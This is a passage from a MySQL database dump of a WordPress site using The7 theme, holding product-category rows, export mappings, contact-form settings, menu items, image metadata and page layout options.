(505830,'Letter Openers',2986,'Office Instruments',2),
(505831,'Cutter & Scraper Blades',2174,'Tool Blades',3),
(505832,'Kitchen Linens Sets',4171,'Linens & Bedding',2);
/*!40000 ALTER TABLE `dnctiavkr_pmxe_google_cats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_pmxe_posts`
--

DROP TABLE IF EXISTS `dnctiavkr_pmxe_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_pmxe_posts` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL,
  `export_id` bigint(20) unsigned NOT NULL,
  `iteration` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=171 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_pmxe_posts`
--

LOCK TABLES `dnctiavkr_pmxe_posts` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_pmxe_posts` DISABLE KEYS */;
INSERT INTO `dnctiavkr_pmxe_posts` VALUES
(1,2487,1,1),
(2,2495,1,1),
(3,2498,1,1),
(4,2500,1,1),
(5,2503,1,1),
(6,2521,1,1),
(7,2523,1,1),
(8,2525,1,1),
(9,2527,1,1),
(10,2531,1,1),
(11,2533,1,1),
(12,2535,1,1),
(13,2537,1,1),
(14,2539,1,1),
(15,2541,1,1),
(16,2543,1,1),
(17,2545,1,1),
(18,2547,1,1),
(19,2549,1,1),
(20,2599,1,1),
(21,2601,1,1),
(22,2603,1,1),
(23,2605,1,1),
(24,2607,1,1),
(25,2705,1,1),
(26,2707,1,1),
(27,2709,1,1),
(28,2717,1,1),
(29,2719,1,1),
(30,2721,1,1),
(31,2723,1,1),
(32,2745,1,1),
(33,2747,1,1),
(34,2749,1,1),
(35,2751,1,1),
(36,2808,1,1),
(37,2810,1,1),
(38,2818,1,1),
(39,2820,1,1),
(40,2822,1,1),
(41,2824,1,1),
(42,2826,1,1),
(43,2828,1,1),
(44,2835,1,1),
(45,2837,1,1),
(46,2839,1,1),
(47,2847,1,1),
(48,2849,1,1),
(49,2851,1,1),
(50,2862,1,1),
(51,2864,1,1),
(52,2872,1,1),
(53,2874,1,1),
(54,2946,1,1),
(55,2959,1,1),
(56,2961,1,1),
(57,2963,1,1),
(58,2965,1,1),
(59,2972,1,1),
(60,2974,1,1),
(61,2976,1,1),
(62,2978,1,1),
(63,2980,1,1),
(64,2982,1,1),
(65,2984,1,1),
(66,2987,1,1),
(67,2989,1,1),
(68,2991,1,1),
(69,3025,1,1),
(70,3027,1,1),
(71,3029,1,1),
(72,3031,1,1),
(73,3033,1,1),
(74,3035,1,1),
(75,3037,1,1),
(76,3039,1,1),
(77,3041,1,1),
(78,3043,1,1),
(79,3045,1,1),
(80,3047,1,1),
(81,3262,1,1),
(82,3264,1,1),
(83,3337,1,1),
(84,3339,1,1),
(85,3341,1,1),
(86,3343,1,1),
(87,3345,1,1),
(88,3347,1,1),
(89,3389,1,1),
(90,3391,1,1),
(91,3393,1,1),
(92,3431,1,1),
(93,3433,1,1),
(94,3434,1,1),
(95,3455,1,1),
(96,3456,1,1),
(97,3458,1,1),
(98,3460,1,1),
(99,3462,1,1),
(100,3502,1,1),
(101,3504,1,1),
(102,3506,1,1),
(103,3508,1,1),
(104,3510,1,1),
(105,3559,1,1),
(106,3577,1,1),
(107,3581,1,1),
(108,3583,1,1),
(109,3585,1,1),
(110,3587,1,1),
(111,3589,1,1),
(112,3591,1,1),
(113,3593,1,1),
(114,3595,1,1),
(115,3597,1,1),
(116,3599,1,1),
(117,3601,1,1),
(118,3606,1,1),
(119,3610,1,1),
(120,3632,1,1),
(121,3634,1,1),
(122,3637,1,1),
(123,3639,1,1),
(124,3641,1,1),
(125,3643,1,1),
(126,3688,1,1),
(127,3693,1,1),
(128,3696,1,1),
(129,3698,1,1),
(130,3715,1,1),
(131,3863,1,1),
(132,3865,1,1),
(133,3867,1,1),
(134,3872,1,1),
(135,3874,1,1),
(136,3876,1,1),
(137,3904,1,1),
(138,3910,1,1),
(139,3912,1,1),
(140,3914,1,1),
(141,3916,1,1),
(142,3918,1,1),
(143,3928,1,1),
(144,3943,1,1),
(145,3948,1,1),
(146,3950,1,1),
(147,3952,1,1),
(148,3954,1,1),
(149,3955,1,1),
(150,3957,1,1),
(151,4024,1,1),
(152,4027,1,1),
(153,4029,1,1),
(154,4071,1,1),
(155,4073,1,1),
(156,4075,1,1),
(157,4077,1,1),
(158,4081,1,1),
(159,4083,1,1),
(160,4578,1,1),
(161,4582,1,1),
(162,4583,1,1),
(163,4611,1,1),
(164,4629,1,1),
(165,4631,1,1),
(166,4633,1,1),
(167,4659,1,1),
(168,4660,1,1),
(169,4661,1,1),
(170,4971,1,1);
/*!40000 ALTER TABLE `dnctiavkr_pmxe_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_pmxe_templates`
--

DROP TABLE IF EXISTS `dnctiavkr_pmxe_templates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_pmxe_templates` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `options` longtext DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_pmxe_templates`
--

LOCK TABLES `dnctiavkr_pmxe_templates` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_pmxe_templates` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_pmxe_templates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_postmeta`
--

DROP TABLE IF EXISTS `dnctiavkr_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=37425 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_postmeta`
--

LOCK TABLES `dnctiavkr_postmeta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_postmeta` DISABLE KEYS */;
INSERT INTO `dnctiavkr_postmeta` VALUES
(5,6,'_form','<label> Your name\n    [text* your-name] </label>\n\n<label> Your email\n    [email* your-email] </label>\n\n<label> Subject\n    [text* your-subject] </label>\n\n<label> Your message (optional)\n    [textarea your-message] </label>\n\n[submit \"Submit\"]'),
(6,6,'_mail','a:8:{s:7:\"subject\";s:30:\"[_site_title] \"[your-subject]\"\";s:6:\"sender\";s:37:\"[_site_title] <wordpress@gsw2023.com>\";s:4:\"body\";s:163:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\";s:9:\"recipient\";s:19:\"[_site_admin_email]\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),
(7,6,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:30:\"[_site_title] \"[your-subject]\"\";s:6:\"sender\";s:37:\"[_site_title] <wordpress@gsw2023.com>\";s:4:\"body\";s:105:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:29:\"Reply-To: [_site_admin_email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),
(8,6,'_messages','a:12:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:27:\"Please fill out this field.\";s:16:\"invalid_too_long\";s:32:\"This field has a too long input.\";s:17:\"invalid_too_short\";s:33:\"This field has a too short input.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:31:\"The uploaded file is too large.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";}'),
(9,6,'_additional_settings',''),
(10,6,'_locale','en_US'),
(11,7,'_elementor_edit_mode','builder'),
(12,7,'_elementor_template_type','kit'),
(27,29,'_wp_attached_file','2022/10/1.jpg'),
(28,29,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:507;s:4:\"file\";s:13:\"2022/10/1.jpg\";s:8:\"filesize\";i:94092;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:13:\"1-300x119.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:119;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10546;}s:5:\"large\";a:5:{s:4:\"file\";s:14:\"1-1024x406.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:406;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70405;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7089;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:13:\"1-768x304.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:304;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45668;}s:28:\"the7_mphb_gallery_image_size\";a:5:{s:4:\"file\";s:13:\"1-200x125.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7708;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1889,2079,'_menu_item_type','custom'),
(1890,2079,'_menu_item_menu_item_parent','0'),
(1891,2079,'_menu_item_object_id','2079'),
(1892,2079,'_menu_item_object','custom'),
(1893,2079,'_menu_item_target',''),
(1894,2079,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(1895,2079,'_menu_item_xfn',''),
(1896,2079,'_menu_item_url','https://the7.io/main/'),
(1897,2079,'_menu_item_the7_mega_menu_settings','a:0:{}'),
(1898,2080,'_menu_item_type','custom'),
(1899,2080,'_menu_item_menu_item_parent','0'),
(1900,2080,'_menu_item_object_id','2080'),
(1901,2080,'_menu_item_object','custom'),
(1902,2080,'_menu_item_target','_blank'),
(1903,2080,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(1904,2080,'_menu_item_xfn','noopener'),
(1905,2080,'_menu_item_url','http://support.dream-theme.com/'),
(1906,2080,'_menu_item_the7_mega_menu_settings','a:0:{}'),
(1907,2081,'_menu_item_type','custom'),
(1908,2081,'_menu_item_menu_item_parent','0'),
(1909,2081,'_menu_item_object_id','2081'),
(1910,2081,'_menu_item_object','custom'),
(1911,2081,'_menu_item_target','_blank'),
(1912,2081,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(1913,2081,'_menu_item_xfn','noopener'),
(1914,2081,'_menu_item_url','https://themeforest.net/item/the7-responsive-multipurpose-wordpress-theme/5556590?ref=Dream-Theme&license=regular&open_purchase_for_item_id=5556590'),
(1915,2081,'_menu_item_the7_mega_menu_settings','a:0:{}'),
(1916,2082,'_menu_item_type','custom'),
(1917,2082,'_menu_item_menu_item_parent','0'),
(1918,2082,'_menu_item_object_id','2082'),
(1919,2082,'_menu_item_object','custom'),
(1920,2082,'_menu_item_target',''),
(1921,2082,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(1922,2082,'_menu_item_xfn',''),
(1923,2082,'_menu_item_url','https://gsw2023.com'),
(1924,2082,'_menu_item_dt_mega_menu_icon','iconfont'),
(1925,2082,'_menu_item_dt_mega_menu_iconfont','<i class=\"fa fa-fw fa-external-link-square\"></i>'),
(1926,2082,'_menu_item_the7_mega_menu_settings','a:21:{s:19:\"menu-item-icon-type\";s:4:\"none\";s:15:\"menu-item-image\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:14:\"menu-item-icon\";s:0:\"\";s:24:\"menu-item-image-position\";s:4:\"left\";s:20:\"menu-item-image-size\";s:9:\"50px 50px\";s:29:\"menu-item-image-border-radius\";s:3:\"0px\";s:23:\"menu-item-image-padding\";s:15:\"0px 6px 0px 0px\";s:29:\"menu-item-hide-icon-on-mobile\";s:3:\"off\";s:19:\"menu-item-icon-html\";s:52:\"<i class=\"fa fa-fw fa-external-link-square-alt\"></i>\";s:19:\"mega-menu-elementor\";s:3:\"off\";s:34:\"mega-menu-elementor-mobile-content\";s:0:\"\";s:9:\"mega-menu\";s:3:\"off\";s:19:\"mega-menu-fullwidth\";s:3:\"off\";s:17:\"mega-menu-columns\";s:1:\"3\";s:20:\"mega-menu-hide-title\";s:3:\"off\";s:21:\"mega-menu-remove-link\";s:3:\"off\";s:23:\"mega-menu-start-new-row\";s:3:\"off\";s:26:\"mega-menu-start-new-column\";s:3:\"off\";s:17:\"mega-menu-widgets\";s:4:\"none\";s:25:\"mega-menu-widgets-padding\";s:15:\"0px 6px 0px 0px\";s:24:\"mega-menu-hide-on-mobile\";s:3:\"off\";}'),
(1927,2083,'_menu_item_type','custom'),
(1928,2083,'_menu_item_menu_item_parent','0'),
(1929,2083,'_menu_item_object_id','2083'),
(1930,2083,'_menu_item_object','custom'),
(1931,2083,'_menu_item_target','_blank'),
(1932,2083,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(1933,2083,'_menu_item_xfn',''),
(1934,2083,'_menu_item_url',''),
(1935,2083,'_menu_item_dt_mega_menu_icon','iconfont'),
(1936,2083,'_menu_item_dt_mega_menu_iconfont','<i class=\"fa fa-fw fa-th\"></i>'),
(1937,2083,'_menu_item_the7_mega_menu_settings','a:21:{s:19:\"menu-item-icon-type\";s:4:\"none\";s:15:\"menu-item-image\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:14:\"menu-item-icon\";s:0:\"\";s:24:\"menu-item-image-position\";s:4:\"left\";s:20:\"menu-item-image-size\";s:9:\"50px 50px\";s:29:\"menu-item-image-border-radius\";s:3:\"0px\";s:23:\"menu-item-image-padding\";s:15:\"0px 6px 0px 0px\";s:29:\"menu-item-hide-icon-on-mobile\";s:3:\"off\";s:19:\"menu-item-icon-html\";s:30:\"<i class=\"fa fa-fw fa-th\"></i>\";s:19:\"mega-menu-elementor\";s:3:\"off\";s:34:\"mega-menu-elementor-mobile-content\";s:0:\"\";s:9:\"mega-menu\";s:3:\"off\";s:19:\"mega-menu-fullwidth\";s:3:\"off\";s:17:\"mega-menu-columns\";s:1:\"3\";s:20:\"mega-menu-hide-title\";s:3:\"off\";s:21:\"mega-menu-remove-link\";s:3:\"off\";s:23:\"mega-menu-start-new-row\";s:3:\"off\";s:26:\"mega-menu-start-new-column\";s:3:\"off\";s:17:\"mega-menu-widgets\";s:4:\"none\";s:25:\"mega-menu-widgets-padding\";s:15:\"0px 6px 0px 0px\";s:24:\"mega-menu-hide-on-mobile\";s:3:\"off\";}'),
(1938,2084,'_menu_item_type','custom'),
(1939,2084,'_menu_item_menu_item_parent','0'),
(1940,2084,'_menu_item_object_id','2084'),
(1941,2084,'_menu_item_object','custom'),
(1942,2084,'_menu_item_target',''),
(1943,2084,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(1944,2084,'_menu_item_xfn',''),
(1945,2084,'_menu_item_url',''),
(1946,2084,'_menu_item_dt_mega_menu_icon','iconfont'),
(1947,2084,'_menu_item_dt_mega_menu_iconfont','<i class=\"fa fa-fw fa-align-left\"></i>'),
(1948,2084,'_menu_item_the7_mega_menu_settings','a:21:{s:19:\"menu-item-icon-type\";s:4:\"none\";s:15:\"menu-item-image\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:14:\"menu-item-icon\";s:0:\"\";s:24:\"menu-item-image-position\";s:4:\"left\";s:20:\"menu-item-image-size\";s:9:\"50px 50px\";s:29:\"menu-item-image-border-radius\";s:3:\"0px\";s:23:\"menu-item-image-padding\";s:15:\"0px 6px 0px 0px\";s:29:\"menu-item-hide-icon-on-mobile\";s:3:\"off\";s:19:\"menu-item-icon-html\";s:38:\"<i class=\"fa fa-fw fa-align-left\"></i>\";s:19:\"mega-menu-elementor\";s:3:\"off\";s:34:\"mega-menu-elementor-mobile-content\";s:0:\"\";s:9:\"mega-menu\";s:3:\"off\";s:19:\"mega-menu-fullwidth\";s:3:\"off\";s:17:\"mega-menu-columns\";s:1:\"3\";s:20:\"mega-menu-hide-title\";s:3:\"off\";s:21:\"mega-menu-remove-link\";s:3:\"off\";s:23:\"mega-menu-start-new-row\";s:3:\"off\";s:26:\"mega-menu-start-new-column\";s:3:\"off\";s:17:\"mega-menu-widgets\";s:4:\"none\";s:25:\"mega-menu-widgets-padding\";s:15:\"0px 6px 0px 0px\";s:24:\"mega-menu-hide-on-mobile\";s:3:\"off\";}'),
(2386,2095,'_edit_last','1'),
(2387,2095,'_thumbnail_id','2374'),
(2388,2095,'_wp_page_template','default'),
(2391,2095,'_wpb_vc_js_status','true'),
(2392,2095,'_dt_sidebar_position','disabled'),
(2393,2095,'_dt_sidebar_widgetarea_id','give-forms-sidebar'),
(2394,2095,'_dt_sidebar_hide_on_mobile','0'),
(2395,2095,'_dt_footer_show','1'),
(2396,2095,'_dt_footer_widgetarea_id','sidebar_2'),
(2397,2095,'_dt_footer_hide_on_mobile','0'),
(2398,2095,'_dt_header_title','fancy'),
(2399,2095,'_dt_header_background','normal'),
(2400,2095,'_dt_header_background_below_slideshow','disabled'),
(2401,2095,'_dt_header_transparent_bg_color_scheme','light'),
(2402,2095,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(2403,2095,'_dt_header_transparent_top_bar_bg_opacity','25'),
(2404,2095,'_dt_header_transparent_bg_color','#000000'),
(2405,2095,'_dt_header_transparent_bg_opacity','50'),
(2406,2095,'_dt_header_disabled_background','normal'),
(2407,2095,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(2408,2095,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(2409,2095,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(2410,2095,'_dt_header_disabled_transparent_bg_color','#000000'),
(2411,2095,'_dt_header_disabled_transparent_bg_opacity','50'),
(2412,2095,'_dt_page_overrides_top_margin',''),
(2413,2095,'_dt_page_overrides_right_margin',''),
(2414,2095,'_dt_page_overrides_bottom_margin',''),
(2415,2095,'_dt_page_overrides_left_margin',''),
(2416,2095,'_dt_mobile_page_padding_top',''),
(2417,2095,'_dt_mobile_page_padding_right',''),
(2418,2095,'_dt_mobile_page_padding_bottom',''),
(2419,2095,'_dt_mobile_page_padding_left',''),
(2420,2095,'_dt_project_options_back_button',''),
(2421,2095,'_dt_project_options_show_link','0'),
(2422,2095,'_dt_project_options_link','https://the7.io/old-landing/online-courses/'),
(2423,2095,'_dt_project_options_link_target','_blank'),
(2424,2095,'_dt_project_options_link_name','Visit demo'),
(2425,2095,'_dt_project_options_hide_thumbnail','1'),
(2426,2095,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(2427,2095,'_dt_project_options_related_mode','same'),
(2428,2095,'_dt_project_options_preview','normal'),
(2429,2095,'_the7_imported_item','old-landing'),
(2574,2150,'_wpb_shortcodes_custom_css','.vc_custom_1480115705454{background-color: #0f1217 !important;}.vc_custom_1561541631124{padding-top: 70px !important;padding-bottom: 80px !important;}.vc_custom_1480111988241{padding-top: 60px !important;padding-bottom: 60px !important;background-color: #0f1217 !important;}.vc_custom_1480115720857{padding-top: 70px !important;padding-bottom: 30px !important;}.vc_custom_1480111769324{padding-bottom: 50px !important;}.vc_custom_1480112480376{padding-top: 60px !important;padding-bottom: 60px !important;background-color: #0f1217 !important;}.vc_custom_1539519331301{margin-right: -20px !important;margin-left: -100% !important;padding-top: 40px !important;padding-bottom: 30px !important;}.vc_custom_1480117153134{padding-top: 70px !important;padding-bottom: 70px !important;}.vc_custom_1480355657702{padding-bottom: 25px !important;}.vc_custom_1480117161323{padding-top: 70px !important;padding-bottom: 70px !important;}.vc_custom_1480354986642{margin-right: -100% !important;padding-top: 40px !important;padding-bottom: 30px !important;}.vc_custom_1480355768174{padding-bottom: 25px !important;}.vc_custom_1480355177330{margin-right: -50px !important;margin-left: -100% !important;padding-top: 40px !important;padding-bottom: 25px !important;}.vc_custom_1480117168229{padding-top: 70px !important;padding-bottom: 70px !important;}.vc_custom_1480355858954{padding-bottom: 25px !important;}.vc_custom_1480355917912{margin-right: -10% !important;margin-left: -10% !important;padding-top: 45px !important;padding-bottom: 10px !important;}.vc_custom_1480117176787{padding-top: 70px !important;padding-bottom: 70px !important;}.vc_custom_1480355407138{margin-right: -100% !important;padding-top: 40px !important;padding-bottom: 30px !important;}.vc_custom_1480355970532{padding-bottom: 30px !important;}.vc_custom_1480356022878{padding-bottom: 25px !important;}.vc_custom_1585210639400{padding-top: 35px !important;}.vc_custom_1480110505228{padding-bottom: 65px !important;}.vc_custom_1480368847088{padding-bottom: 70px !important;}.vc_custom_1480368872679{padding-bottom: 70px !important;}.vc_custom_1480368883967{padding-bottom: 70px !important;}.vc_custom_1480368893600{padding-bottom: 70px !important;}.vc_custom_1480368901612{padding-bottom: 70px !important;}.vc_custom_1480368911187{padding-bottom: 70px !important;}.vc_custom_1480368922883{padding-bottom: 70px !important;}.vc_custom_1480368933650{padding-bottom: 70px !important;}.vc_custom_1480368948510{padding-bottom: 70px !important;}.vc_custom_1480356038558{padding-bottom: 25px !important;}.vc_custom_1480110789588{padding-top: 70px !important;padding-bottom: 80px !important;}.vc_custom_1479848824972{padding-bottom: 50px !important;}.vc_custom_1479848350909{padding-bottom: 50px !important;}.vc_custom_1479848750253{padding-bottom: 50px !important;}.vc_custom_1479848278606{padding-bottom: 50px !important;}.vc_custom_1479848765776{padding-bottom: 50px !important;}.vc_custom_1479848258953{padding-bottom: 50px !important;}.vc_custom_1479848812325{padding-bottom: 50px !important;}.vc_custom_1479847609345{padding-bottom: 50px !important;}.vc_custom_1479850103851{padding-bottom: 50px !important;}.vc_custom_1480356048334{padding-bottom: 25px !important;}.vc_custom_1587577448404{margin-right: 5px !important;margin-bottom: 5px !important;margin-left: 5px !important;}.vc_custom_1587577444257{margin-top: 0px !important;margin-right: 5px !important;margin-bottom: 5px !important;margin-left: 5px !important;}'),
(2575,2150,'_wpb_shortcodes_custom_css','.vc_custom_1480115705454{background-color: #0f1217 !important;}.vc_custom_1561541631124{padding-top: 70px !important;padding-bottom: 80px !important;}.vc_custom_1480111988241{padding-top: 60px !important;padding-bottom: 60px !important;background-color: #0f1217 !important;}.vc_custom_1480115720857{padding-top: 70px !important;padding-bottom: 30px !important;}.vc_custom_1480111769324{padding-bottom: 50px !important;}.vc_custom_1480112480376{padding-top: 60px !important;padding-bottom: 60px !important;background-color: #0f1217 !important;}.vc_custom_1539519331301{margin-right: -20px !important;margin-left: -100% !important;padding-top: 40px !important;padding-bottom: 30px !important;}.vc_custom_1480117153134{padding-top: 70px !important;padding-bottom: 70px !important;}.vc_custom_1480355657702{padding-bottom: 25px !important;}.vc_custom_1480117161323{padding-top: 70px !important;padding-bottom: 70px !important;}.vc_custom_1480354986642{margin-right: -100% !important;padding-top: 40px !important;padding-bottom: 30px !important;}.vc_custom_1480355768174{padding-bottom: 25px !important;}.vc_custom_1480355177330{margin-right: -50px !important;margin-left: -100% !important;padding-top: 40px !important;padding-bottom: 25px !important;}.vc_custom_1480117168229{padding-top: 70px !important;padding-bottom: 70px !important;}.vc_custom_1480355858954{padding-bottom: 25px !important;}.vc_custom_1480355917912{margin-right: -10% !important;margin-left: -10% !important;padding-top: 45px !important;padding-bottom: 10px !important;}.vc_custom_1480117176787{padding-top: 70px !important;padding-bottom: 70px !important;}.vc_custom_1480355407138{margin-right: -100% !important;padding-top: 40px !important;padding-bottom: 30px !important;}.vc_custom_1480355970532{padding-bottom: 30px !important;}.vc_custom_1480356022878{padding-bottom: 25px !important;}.vc_custom_1585210639400{padding-top: 35px !important;}.vc_custom_1480110505228{padding-bottom: 65px !important;}.vc_custom_1480368847088{padding-bottom: 70px !important;}.vc_custom_1480368872679{padding-bottom: 70px !important;}.vc_custom_1480368883967{padding-bottom: 70px !important;}.vc_custom_1480368893600{padding-bottom: 70px !important;}.vc_custom_1480368901612{padding-bottom: 70px !important;}.vc_custom_1480368911187{padding-bottom: 70px !important;}.vc_custom_1480368922883{padding-bottom: 70px !important;}.vc_custom_1480368933650{padding-bottom: 70px !important;}.vc_custom_1480368948510{padding-bottom: 70px !important;}.vc_custom_1480356038558{padding-bottom: 25px !important;}.vc_custom_1480110789588{padding-top: 70px !important;padding-bottom: 80px !important;}.vc_custom_1479848824972{padding-bottom: 50px !important;}.vc_custom_1479848350909{padding-bottom: 50px !important;}.vc_custom_1479848750253{padding-bottom: 50px !important;}.vc_custom_1479848278606{padding-bottom: 50px !important;}.vc_custom_1479848765776{padding-bottom: 50px !important;}.vc_custom_1479848258953{padding-bottom: 50px !important;}.vc_custom_1479848812325{padding-bottom: 50px !important;}.vc_custom_1479847609345{padding-bottom: 50px !important;}.vc_custom_1479850103851{padding-bottom: 50px !important;}.vc_custom_1480356048334{padding-bottom: 25px !important;}.vc_custom_1587577448404{margin-right: 5px !important;margin-bottom: 5px !important;margin-left: 5px !important;}.vc_custom_1587577444257{margin-top: 0px !important;margin-right: 5px !important;margin-bottom: 5px !important;margin-left: 5px !important;}'),
(2576,2150,'_wp_page_template','template-microsite.php'),
(2577,2150,'_edit_last','1'),
(2578,2150,'slide_template','default'),
(2579,2150,'_wpb_vc_js_status','true'),
(2580,2150,'_dt_sidebar_position','disabled'),
(2581,2150,'_dt_sidebar_widgetarea_id','sidebar_1'),
(2582,2150,'_dt_sidebar_hide_on_mobile','0'),
(2583,2150,'_dt_footer_show','0'),
(2584,2150,'_dt_footer_widgetarea_id','sidebar_2'),
(2585,2150,'_dt_footer_hide_on_mobile','0'),
(2586,2150,'_dt_header_title','slideshow'),
(2587,2150,'_dt_header_background','transparent'),
(2588,2150,'_dt_header_background_below_slideshow','disabled'),
(2589,2150,'_dt_header_transparent_bg_color','#000000'),
(2590,2150,'_dt_header_transparent_bg_opacity','0'),
(2591,2150,'_dt_header_transparent_bg_color_scheme','from_options'),
(2592,2150,'_dt_header_disabled_background','normal'),
(2593,2150,'_dt_header_disabled_transparent_bg_color','#000000'),
(2594,2150,'_dt_header_disabled_transparent_bg_opacity','50'),
(2595,2150,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(2596,2150,'_dt_page_overrides_top_margin','0px'),
(2597,2150,'_dt_page_overrides_bottom_margin','0px'),
(2598,2150,'_dt_slideshow_mode','revolution'),
(2599,2150,'_dt_slideshow_layout','fullwidth'),
(2600,2150,'_dt_slideshow_slider_proportions','a:2:{s:5:\"width\";s:4:\"1200\";s:6:\"height\";s:3:\"500\";}'),
(2601,2150,'_dt_slideshow_scaling','fill'),
(2602,2150,'_dt_slideshow_autoplay','paused'),
(2603,2150,'_dt_slideshow_autoslide_interval','5000'),
(2604,2150,'_dt_slideshow_hide_captions','0'),
(2605,2150,'_dt_slideshow_photo_scroller_layout','fullscreen'),
(2606,2150,'_dt_slideshow_photo_scroller_bg_color','#000000'),
(2607,2150,'_dt_slideshow_photo_scroller_overlay','1'),
(2608,2150,'_dt_slideshow_photo_scroller_top_padding','0'),
(2609,2150,'_dt_slideshow_photo_scroller_bottom_padding','0'),
(2610,2150,'_dt_slideshow_photo_scroller_side_paddings','0'),
(2611,2150,'_dt_slideshow_photo_scroller_inactive_opacity','15'),
(2612,2150,'_dt_slideshow_photo_scroller_thumbnails_visibility','show'),
(2613,2150,'_dt_slideshow_photo_scroller_thumbnails_height','85'),
(2614,2150,'_dt_slideshow_photo_scroller_autoplay','play'),
(2615,2150,'_dt_slideshow_photo_scroller_autoplay_speed','4000'),
(2616,2150,'_dt_slideshow_photo_scroller_ls_max_width','100'),
(2617,2150,'_dt_slideshow_photo_scroller_ls_min_width','0'),
(2618,2150,'_dt_slideshow_photo_scroller_ls_fill_dt','fit'),
